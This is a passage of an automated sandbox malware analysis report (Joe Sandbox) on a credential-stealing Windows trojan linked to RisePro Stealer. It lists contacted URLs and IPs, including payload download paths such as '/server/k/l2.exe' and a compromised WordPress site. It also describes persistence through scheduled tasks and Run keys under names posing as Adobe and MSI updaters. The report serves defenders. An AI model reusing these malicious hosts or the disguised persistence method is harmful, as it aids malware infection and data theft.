                                                        https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?verfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://easy2buy.ae/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://schema.org/WPHeaderfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                          		high
                                                          https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://ipinfo.io/file.exe, 00000000.00000002.3215228010.0000000001750000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/animation.css?ver=2.2.0file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://easy2buy.ae/wp-includes/js/hoverIntent.min.js?ver=1.10.2file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/htbbootstrap.js?ver=2.2.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLD87fZN3R3jFeplaces.sqlite.0.drfalse
                                                              		high
                                                              https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.jsfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://db-ip.com:443/demo/home.php?s=81.181.60.11-Type:file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://easy2buy.ae/investment-tax-and-accounting-advisory/EdgeMS2.exe.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://easy2buy.ae/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://easy2buy.ae/wp-json/file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.instagram.com/easy2buydubai/file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                  		high
                                                                  https://easy2buy.ae/comments/feed/file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://easy2buy.ae/general-guidance-on-living-in-dubai/EdgeMS2.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://easy2buy.ae/wp-content/upgrade/k.exexefile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://ocsp.sectigo.com0file.exefalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://easy2buy.ae/blog/file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://schema.org/WPFooterfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                    		high
                                                                    https://yoast.com/wordpress/plugins/seo/file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                      		high
                                                                      https://easy2buy.ae/resale-of-the-apartment/file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/elemefile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://easy2buy.ae/#organizationEdgeMS2.exe.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://easy2buy.ae/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/custom-marker.js?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drfalse
                                                                        		high
                                                                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/js/newhome-core.min.js?ver=6.5.3file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/markerclusterer.js?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://easy2buy.ae/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://easy2buy.ae/wp-content/plugins/page-links-to/dist/new-tab.js?ver=3.3.6file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687512247file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://easy2buy.ae/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.1.1file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        34.117.186.192
                                                                        		ipinfo.ioUnited States
                                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                        193.233.132.175
                                                                        		unknownRussian Federation
                                                                        		2895FREE-NET-ASFREEnetEUfalse
                                                                        5.42.96.65
                                                                        		unknownRussian Federation
                                                                        		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                                                                        172.67.75.166
                                                                        		db-ip.comUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        185.199.220.53
                                                                        		easy2buy.aeUnited Kingdom
                                                                        		12488KRYSTALGRfalse

                                                                        General Information

                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                        Analysis ID:1440169
                                                                        Start date and time:2024-05-12 12:30:08 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 12s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@8/30@3/5
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 54%
                                                                        • Number of executed functions: 50
                                                                        • Number of non-executed functions: 26
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        12:31:52Task SchedulerRun new task: MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR path: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
                                                                        12:31:52Task SchedulerRun new task: MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG path: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
                                                                        12:31:52API Interceptor66x Sleep call for process: file.exe modified
                                                                        12:31:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe
                                                                        12:32:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe
                                                                        12:32:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        34.117.186.192SecuriteInfo.com.Win32.Evo-gen.24318.16217.exeGet hashmaliciousUnknownBrowse
                                                                        • ipinfo.io/json
                                                                        SecuriteInfo.com.Win32.Evo-gen.28489.31883.exeGet hashmaliciousUnknownBrowse
                                                                        • ipinfo.io/json
                                                                        Raptor.HardwareService.Setup 1.msiGet hashmaliciousUnknownBrowse
                                                                        • ipinfo.io/ip
                                                                        Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                                                                        • ipinfo.io/
                                                                        Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                                                                        • ipinfo.io/
                                                                        w.shGet hashmaliciousXmrigBrowse
                                                                        • /ip
                                                                        Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                                                                        • ipinfo.io/ip
                                                                        Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                                                                        • ipinfo.io/ip
                                                                        uUsgzQ3DoW.exeGet hashmaliciousRedLineBrowse
                                                                        • ipinfo.io/ip
                                                                        8BZBgbeCcz.exeGet hashmaliciousRedLineBrowse
                                                                        • ipinfo.io/ip
                                                                        193.233.132.175file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ipinfo.iofile.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        vMVtHAaYPS.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        DKYxuyu8p1.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        Z1AFrCk6zF.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        Tool-Scan-Proxy.docGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                        • 34.117.186.192
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        7Tat3LP3VY.msiGet hashmaliciousUnknownBrowse
                                                                        • 34.117.186.192
                                                                        easy2buy.aefile.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 185.199.220.53
                                                                        db-ip.comfile.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.5.15
                                                                        vMVtHAaYPS.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.4.15
                                                                        DKYxuyu8p1.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 172.67.75.166
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.5.15
                                                                        Z1AFrCk6zF.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.5.15
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 172.67.75.166
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.4.15
                                                                        file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.5.15
                                                                        mrH7nYSmPU.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.5.15
                                                                        mrH7nYSmPU.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 104.26.5.15

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
                                                                        vMVtHAaYPS.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                        • 34.117.186.192
